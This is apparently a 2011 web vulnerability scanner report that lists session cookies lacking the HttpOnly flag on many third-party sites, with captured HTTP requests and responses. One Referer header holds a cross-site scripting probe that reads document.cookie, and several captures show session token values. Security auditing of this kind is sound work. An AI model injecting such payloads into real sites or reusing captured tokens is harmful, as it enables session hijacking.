HTTP/1.1 302 Object moved Date: Sun, 15 May 2011 13:16:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://www.active24.co.uk Content-Length: 146 Content-Type: text/html Expires: Sun, 15 May 2011 13:15:19 GMT Set-Cookie: UserName=Anonymous; path=/ Set-Cookie: UserId=; path=/ Set-Cookie: ASPSESSIONIDCQBBQBDS=BELLPANDDHAGCFHHPHHGMDEP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://www.active24.co.uk">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bigcommerce-vs-oscommerce.php?ga_campaign=(roi)+competitors&ga_adgroup=oscommerce&ga_keyword=osCommerce&gclid=CMjIyryO6qgCFc065Qod0hgzvA HTTP/1.1 Host: www.bigcommerce.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /businesses/medicineshoppe/ HTTP/1.1 Host: www.cardinal.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:18:47 GMT Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix) Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie Set-Cookie: WCMPRDJSESSIONID=0000wQY9Uai9sD5UK2UPoVRQQAy:15296v7eo; Path=/ Content-Type: text/html Content-Language: en Content-Length: 52776
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- last updated 2010-12-01 14:10 -- ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.asp HTTP/1.1 Host: www.cisp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 15 May 2011 13:16:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://www.cisp.com Content-Length: 0 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQBSBSTC=IIMJIGEDIFAIFDOMLEJKOKJI; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cvtelecom.cv Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: SESSd45f694fe0a9cd7f98205f36db4e321c=uu217t5m2qripfeaju7esenpd2; path=/; domain=.cvtelecom.cv Last-Modified: Wed, 11 May 2011 18:24:18 GMT ETag: "2c7249aeff48e50d52e963975adf4829" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-pt" lang="pt-pt" dir="ltr"> <he ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.grics.qc.ca Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: Keep-Alive Content-Length: 23143 Date: Sun, 15 May 2011 13:16:18 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=xwe1jw55vxsm4djw4gv1sdim; path=/ Cache-Control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 15 May 2011 13:15:58 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDQQDRABTC=HDJBGCODNKCBGCKNCEPEIPGB; path=/ Vary: Accept-Encoding Content-Length: 17624
<HTML> <HEAD> <META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync services.' ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.munichmyway.com Proxy-Connection: keep-alive Referer: http://shops.oscommerce.com/directory/goto,38927 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1 Host: www.new.onebox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=1ontji5p9a1ifvihu5pibr2d55; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /websites/0521accad976e199620f2fe160d311fa HTTP/1.1 Host: www.onbile.com Proxy-Connection: keep-alive Referer: http://finans.turk.net/borsa/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.onebox.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oscommerce-manager.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=f2ni175et9jr77e2aa6q7luam7; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /magento2/?gclid=CNiAssSO6qgCFUiK4AodyzqKCA HTTP/1.1 Host: www.redstage.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:56:41 GMT Server: Apache/2.2.3 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=f2ni175et9jr77e2aa6q7luam7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 16646
<html> <head> <title>Magento, Magento E-Commerce, Magento Developers, Magento Custom Sites | Redstage Netwoks</title> <meta name="description" content="Redstage is a full-service web agency, specializ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESS0684c6974b27be9f5aede608f11c100b=b477739a076f4cf3a3fad936f37a2922; expires=Tue, 07 Jun 2011 17:17:16 GMT; path=/; domain=.servercentral.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.telecom.pt Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 15 May 2011 13:15:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: http://www.telecom.pt/InternetResource/PTSite/PT Set-Cookie: ASP.NET_SessionId=vjl25m550du4vw2pabhtla55; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 165
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='http://www.telecom.pt/InternetResource/PTSite/PT'>here</a>.</h2> </body></html>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.teleflora.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /oscommerce-templates.php HTTP/1.1 Host: www.templatemonster.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.turk.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 15 May 2011 13:16:24 GMT Server: Microsoft-IIS/6.0 Server_ID: W5 X-Powered-By: ASP.NET Content-Length: 80500 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQQRCCBT=GHHJPNIDFJFGHJLPHHEFPOLI; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META http-equiv="Cont ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /us/en/services/it-services.html HTTP/1.1 Host: www8.hp.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Cache-Control: no-cache="set-cookie" Last-Modified: Fri, 13 May 2011 23:45:42 GMT Product: Tridion 2009 Dynamic Content Web Application X-Powered-By: Servlet/2.5 JSP/2.1 Product-Version: 1.4.05, Revision 1348 Content-Type: text/html; charset=UTF-8 Date: Sun, 15 May 2011 13:23:05 GMT Connection: close Vary: Accept-Encoding Set-Cookie: JSESSIONID=mLmRNPTZ21wNFG60nrR6JBqh3vF3fknVyzsdnWrWxQvYP1SJyJZT!946051000; path=/ Content-Length: 141253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:cwa="http://www.hp.com/cwa" l ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pxoxicm?oxid=55c24d3f-420f-e5d1-3d86-830e190a9e3c HTTP/1.1 Host: a.triggit.com Proxy-Connection: keep-alive Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: trgu=962ff5fc-04a1-4f8a-bd23-abf5347b50b4; domain=.triggit.com; path=/; expires=Sun, 15-May-2016 00:00:00 GMT; Content-Type: image/gif P3P: CP="DEVo PSDo OUR BUS DSP ALL COR" Date: Sun, 15 May 2011 14:06:34 GMT Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=684&id=1&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_t9z0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsiPus_jXrh="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRYuvuiWxK5heZbiXhLgjogY3epOerrP4/9PQgCTNzSvrP9Y4WriuhDJ8LUH4CyhiygbkI6Qe46QL3ysOTq8CWCjajF58cLZR38/cuDQBah3RSAXQrcuwCKK48DLMBFdbO9047tQyRaTxgKde4Mm03TcBXyOmbzMtUOO6J1FvDTSjZWhE="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Set-Cookie: rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxZvzsVdi8NiprYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3wbhguSrbE1R5AjsszxQ7b2phQztEEL62sdHARDtFbH3OJm/VPdOINnDb+86Nrzef85GLUTSOmQvDMUO4BgHEgBahj4nShXBrxvzGGSgFxKeOi/wnURRHhCsUk3w6bNETq9ndhTT/TyjyQQV6c1knNyzAR8F0SMmPc7F1XP1SWGwHv4lmVjL6tsMqn9hwdjG2Z2hXONeoPHhNgeyMXMKDvY80hwkmCgrYDzekHPadb5bUcrHvsM5o4WPU2TIAYM6hIuH6jvt4FcFbTkZBk9q7caxcxI2TJpwDYfDKhb2bpjeGdZoqJ64fCKH3HoxZHfHIW3ohUSVLFElW2dzNek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0uHXPvFFCY2Evk4YaLTmYjNE07RfYpxCTaGGg/BdkFC6HM8llsGAFcBnyoJmDj3YaTqrACMoAJTlW5TriVRhc0NWg84j7RXnaqskHltoSyiREwzu6qrMZhfYCTDcN8gjoa9P/CIhtjyJ4oyARPv25F9kJRGwyOgsOqdBmOnVb9IoyXr5WIWzf4q+vmTbO5TCBBuTR1zVApcQcU/o5DdbcpTo7+6xV1qaCy/a9Q9My4u85XsEQQaxzD/ydbuZZkmsuUqZJ7vRCvvf/OQpmY9l9LvHGNlEL1TRNTD4+MDArWjX2PQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/ Content-Type: application/x-javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sun, 15 May 2011 13:19:34 GMT Content-Length: 541
function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;} i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /track.fcgi?merchantid=3100817967&eventid=0&ifmode=1 HTTP/1.1 Host: adserver.veruta.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1819375;type=telef451;cat=telef469;ord=1;num=3476285561919.2124? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.